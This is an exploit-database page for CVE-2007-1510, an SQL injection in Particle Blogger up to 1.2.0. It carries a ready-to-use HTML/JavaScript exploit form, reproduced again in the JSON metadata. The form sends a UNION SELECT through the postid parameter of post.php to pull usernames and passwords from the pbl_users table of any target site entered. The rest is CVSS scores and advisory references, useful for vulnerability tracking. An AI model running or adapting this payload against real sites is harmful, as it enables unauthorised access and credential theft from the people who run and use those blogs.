Search...

Particle Blogger <= 1.2.0 post.php postid Remote SQL Injection Exploit

2007-03-16T00:00:00

ID EDB-ID:3500
Type exploitdb
Reporter WiLdBoY
Modified 2007-03-16T00:00:00

Description

Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit. CVE-2007-1510. Webapps exploit for php platform

                                        
                                            &lt;!--

Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit

Type :

SQL Injection

Release Date :

{2007-03-16}

Product / Vendor :

Particle Soft

http://blogger.particlesoft.net/

Bug :

http://localhost/script/post.php?postid=-SQL Inj-

Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit :

--&gt;

&lt;title&gt;Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit&lt;/title&gt;
&lt;body bgcolor="#000000"&gt;
&lt;script language="JavaScript"&gt;
function ps() {
  {
    unique.action=""+document.unique.site.value+"/post.php?postid=-1/**/UNION/**/SELECT/**/null,username,password,null,null,null,null/**/FROM/**/pbl_users/*";
    unique.submit();
  }
}
&lt;/script&gt;
&lt;center&gt;&lt;font face="Verdana" size="2" color="#FF0000"&gt;&lt;b&gt;Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit&lt;/b&gt;&lt;/font&gt;&lt;/center&gt;
&lt;form name="unique" method="POST" onsubmit="ps();"&gt;
&lt;center&gt;&lt;font face="Arial" size="2" color="#00FF00"&gt;Site Address :&lt;/td&gt;&lt;/center&gt;&lt;br&gt;
&lt;center&gt;&lt;input type="text" name="site" value="http://localhost/script" size="44" class="unique" class="inputbox"&gt;&lt;/center&gt;&lt;br&gt;
&lt;center&gt;&lt;input type="submit" value="Apply" class="unique"&gt;&lt;/center&gt;&lt;br&gt;
&lt;center&gt;&lt;font face="Verdana" size="2" color="#FF0000"&gt;&lt;b&gt;UniquE-Key{UniquE-Cracker}&lt;/b&gt;&lt;/font&gt;
&lt;br&gt;
&lt;font face="Verdana" size="2" color="#FF0000"&gt;&lt;b&gt;UniquE@UniquE-Key.ORG&lt;/b&gt;&lt;/font&gt;
&lt;br&gt;
&lt;font face="Verdana" size="2" color="#FF0000"&gt;&lt;b&gt;http://UniquE-Key.ORG&lt;/b&gt;&lt;/font&gt;&lt;/center&gt;

&lt;!--

Tested :

Particle Blogger 1.1.2

Vulnerable :

Particle Blogger 1.2.0

Particle Blogger 1.1.2

Particle Blogger 1.1.1

Particle Blogger 1.1.0

Particle Blogger 1.0.0

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org

--&gt;

# milw0rm.com [2007-03-16]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:3500", "hash": "da8ea88f9b7ec5ca4a2c38b29c901f11", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Particle Blogger <= 1.2.0 post.php postid Remote SQL Injection Exploit", "description": "Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit. CVE-2007-1510. Webapps exploit for php platform", "published": "2007-03-16T00:00:00", "modified": "2007-03-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3500/", "reporter": "WiLdBoY", "references": [], "cvelist": ["CVE-2007-1510"], "lastseen": "2016-01-31T18:37:57", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1510"]}, {"type": "osvdb", "idList": ["OSVDB:34305"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7414"]}], "modified": "2016-01-31T18:37:57"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3500/", "sourceData": "\n\n<title>Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit</title>\n<body bgcolor=\"#000000\">\n<script language=\"JavaScript\">\nfunction ps() {\n {\n unique.action=\"\"+document.unique.site.value+\"/post.php?postid=-1/**/UNION/**/SELECT/**/null,username,password,null,null,null,null/**/FROM/**/pbl_users/*\";\n unique.submit();\n }\n}\n</script>\n<center><font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit</b></font></center>\n<form name=\"unique\" method=\"POST\" onsubmit=\"ps();\">\n<center><font face=\"Arial\" size=\"2\" color=\"#00FF00\">Site Address :</td></center><br>\n<center><input type=\"text\" name=\"site\" value=\"http://localhost/script\" size=\"44\" class=\"unique\" class=\"inputbox\"></center><br>\n<center><input type=\"submit\" value=\"Apply\" class=\"unique\"></center><br>\n<center><font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>UniquE-Key{UniquE-Cracker}</b></font>\n<br>\n<font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>UniquE@UniquE-Key.ORG</b></font>\n<br>\n<font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>http://UniquE-Key.ORG</b></font></center>\n\n\n\n# milw0rm.com [2007-03-16]\n", "osvdbidlist": ["34305"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2018-10-18T15:06:08", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in post.php in Particle Blogger 1.0.0 through 1.2.0 allows remote attackers to execute arbitrary SQL commands via the postid parameter.", "modified": "2018-10-16T12:38:50", "published": "2007-03-20T06:19:00", "id": "CVE-2007-1510", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1510", "title": "CVE-2007-1510", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24559](https://secuniaresearch.flexerasoftware.com/advisories/24559/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0218.html\nISS X-Force ID: 33030\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3500\nFrSIRT Advisory: ADV-2007-1006\n[CVE-2007-1510](https://vulners.com/cve/CVE-2007-1510)\nBugtraq ID: 23005\n", "modified": "2007-03-16T09:04:10", "published": "2007-03-16T09:04:10", "href": "https://vulners.com/osvdb/OSVDB:34305", "id": "OSVDB:34305", "title": "Particle Blogger post.php postid Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-03-17T00:00:00", "published": "2007-03-17T00:00:00", "id": "SECURITYVULNS:VULN:7414", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7414", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

Particle Blogger &lt;= 1.2.0 post.php postid Remote SQL Injection Exploit

Description

Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit. CVE-2007-1510. Webapps exploit for php platform

Particle Blogger <= 1.2.0 post.php postid Remote SQL Injection Exploit